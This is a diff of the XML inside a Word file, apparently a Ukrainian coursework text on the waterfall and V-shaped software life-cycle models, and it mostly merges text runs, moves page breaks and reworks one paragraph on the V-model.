-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55F10CF0-A310-4ABB-9178-555DF61AC711}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA435F37-0A70-466C-9F87-7FD5CF1D54D1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -488,25 +488,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">ілки, в результаті чого вийшов графік </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>стандартного</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -631,20 +613,10 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
@@ -667,17 +639,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -810,16 +771,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
+        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -876,6 +828,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -1105,16 +1058,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">процесом </w:t>
+        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1173,6 +1117,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>процес виведення з експлуатації - ви</w:t>
       </w:r>
       <w:r>
@@ -1291,10 +1236,13 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1309,6 +1257,7 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1320,18 +1269,6 @@
         </w:rPr>
         <w:t>Переваги каскадної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1755,7 +1692,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Вона являє собою шаблон, в який можна помістити методи для виконання аналізу, проектування, кодування, тестування і забезпечення;</w:t>
       </w:r>
     </w:p>
@@ -1820,6 +1756,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>вона сприяє здійсненню суворого контролю менеджменту проекту;</w:t>
       </w:r>
     </w:p>
@@ -2141,17 +2078,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2251,7 +2177,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>вона не може запобігти виникненню ітерацій між фазами, які так часто зустрічаються при розробці ПЗ, оскільки сама модель створюється відповідно до стандартного циклу апаратного інжинірингу;</w:t>
       </w:r>
     </w:p>
@@ -2320,6 +2245,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>інтеграція всіх отриманих результатів відбувається раптово в завершальній стадії роботи моделі. В результаті такого одиничного проходу через весь процес, пов'язані з інтеграцією проблеми, як правило, дають про себе знати занадто пізно. Отже, виявилися не виявлені раніше помилки або конструктивні недоліки, підвищити ступінь ризику при невеликому завданню часу на відновлення продукту;</w:t>
       </w:r>
     </w:p>
@@ -2463,7 +2389,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>проект можна виконати, застосувавши впорядковану каскадну модель, і привести його у відповідність з письмовими вимогами, що, однак, не гарантує його запуску в експлуатацію;</w:t>
       </w:r>
     </w:p>
@@ -2514,7 +2439,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>для кожної фази створюються результативні дані, які по його завершенню вважаються замороженими. Це означає, що вони не повинні змінюватися на наступних етапах життєвого циклу продукту. Якщо елемент результативних даних будь-якого етапу змінюється (що зустрічається досить часто), на проект зробить негативний вплив зміна графіка, оскільки ні модель, ні план не були розраховані на внесення та дозвіл зміни на більш пізніх етапах життєвого циклу;</w:t>
+        <w:t xml:space="preserve">для кожної фази створюються результативні дані, які по його завершенню вважаються замороженими. Це означає, що вони не </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>повинні змінюватися на наступних етапах життєвого циклу продукту. Якщо елемент результативних даних будь-якого етапу змінюється (що зустрічається досить часто), на проект зробить негативний вплив зміна графіка, оскільки ні модель, ні план не були розраховані на внесення та дозвіл зміни на більш пізніх етапах життєвого циклу;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2650,17 +2585,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> дозволяє повторно </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>розподілити кошти, не зруйнувавши при цьому проект в процесі його виконання;</w:t>
+        <w:t xml:space="preserve"> дозволяє повторно розподілити кошти, не зруйнувавши при цьому проект в процесі його виконання;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2747,6 +2672,199 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель була с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>творена з метою допомогти працю</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ючій</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> над проектом команді в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>плануванні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проектує</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ться</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2789,16 +2907,35 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> модель була с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>творена з метою допомогти працю</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> модель, показана </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на рис. 4.10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, була розроблена як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2806,15 +2943,69 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ючій</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> над проектом команді в </w:t>
+        <w:t>ізновид</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2823,288 +3014,19 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>плануванні</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>є,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проектує</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ться</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-н</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>пунктирною</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t>проектування</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, які передують кодування, після якого йдуть фази тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>подібна</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модель, показана </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
